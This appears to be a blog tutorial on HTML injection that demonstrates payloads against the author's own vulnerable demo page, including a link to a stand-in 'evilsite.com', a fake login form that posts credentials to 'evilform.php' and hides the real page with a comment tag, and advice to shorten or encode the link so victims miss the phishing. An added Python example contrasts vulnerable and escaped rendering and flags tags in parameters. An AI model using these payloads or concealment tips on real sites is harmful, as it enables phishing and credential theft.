WebApp Pentesting: What is HTML Injection


Hi Everyone 

So in this post we will talk about HTML injection.

HTML injection is similar to a Cross Site Scripting (XSS) attack. In XSS the attacker inserts malicious script tags to run JavaScript, whereas in HTML injection the attacker inserts ordinary HTML tags in order to modify the page for malicious purposes.


Why does HTML injection happen?

When an application does not properly handle user-supplied data (it places the raw value into the page instead of HTML-encoding it), an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page.

To demonstrate this I have hosted a vulnerable webpage at http://htmli.comlu.com/html.php
When you visit this page you can see that the webpage says:
Hi Mr  Thanks for looking here
Now you can pass a parameter to it by appending ?name=ANY_HTML_VALUE, so the final URL will be
http://htmli.comlu.com/html.php?name=ANY_VALUE

Let's try to exploit it.

First we will put some content inside a <b> tag.
Use this URL and you can see that the injected text is rendered in bold (dark black): http://htmli.comlu.com/html.php?name=<b>html-injection</b>

Redirecting the user to a malicious site

http://htmli.comlu.com/html.php?name=<a href="evilsite.com">Click here to login</a>

Creating a fake login form

http://htmli.comlu.com/html.php?name=<form action="evilform.php" method="post"><input type="text" name="user" placeholder="username"></br><input type="password" name="pass" placeholder="pass"><!--
I used a comment tag (<!--) at the end of the form so that all the remaining content of the original page is commented out and not displayed.

Displaying a fake message

To display a fake message you can use this: http://htmli.comlu.com/html.php?name=<p>we have changed our website login page please go to evilsite.com for login</p>
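To make clear why the page above is injectable and what the fix looks like, here is an added example (not the code of html.php, which is not shown on the page). It models the vulnerable template as a Python function that concatenates the name parameter into the page, puts the hardened version beside it, and adds a simple log-review check a defender can run over parameter values; the payloads are the ones used above.

```python
import html
import re

# Constructed stand-in for the vulnerable html.php: the ?name= value is
# concatenated into the page as-is, so any HTML in it becomes part of the DOM.
def render_vulnerable(name: str) -> str:
    return f"<p>Hi Mr {name} Thanks for looking here</p>"

# Hardened version: the value is HTML-escaped (including quotes) before it is
# placed in the page, so the browser shows the tags as literal text.
def render_safe(name: str) -> str:
    return f"<p>Hi Mr {html.escape(name, quote=True)} Thanks for looking here</p>"

# Heuristic a defender might run over request logs: does a parameter value
# open an HTML tag or an HTML comment? (assumption: a simple regex is enough
# here; a stray "<" followed by a digit or space is not flagged)
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]")

def looks_like_html_injection(value: str) -> bool:
    return bool(TAG_RE.search(value))

if __name__ == "__main__":
    # Constructed sample values: a normal name plus the payloads from the post.
    payloads = [
        "Jitendra",
        "<b>html-injection</b>",
        '<a href="evilsite.com">Click here to login</a>',
        '<form action="evilform.php" method="post"><input type="text" name="user"><!--',
    ]
    for p in payloads:
        print("vulnerable:", render_vulnerable(p))
        print("safe      :", render_safe(p))
        print("flagged   :", looks_like_html_injection(p))
        print()
```

In the hardened output the comment opener <!-- becomes &lt;!-- text, so it can no longer swallow the rest of the page.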


So the question is: if we send this URL to a user, he will see from the URL that we are doing a phishing attack on him.
So you can encode the URL, or shorten it using any URL shortening service like goo.gl.


That's all for this post.
Hope you enjoyed it.

Suggestions are welcome. Please comment below with your feedback.


Thanks
Jitendra Kumar Singh(Team Computer Korner)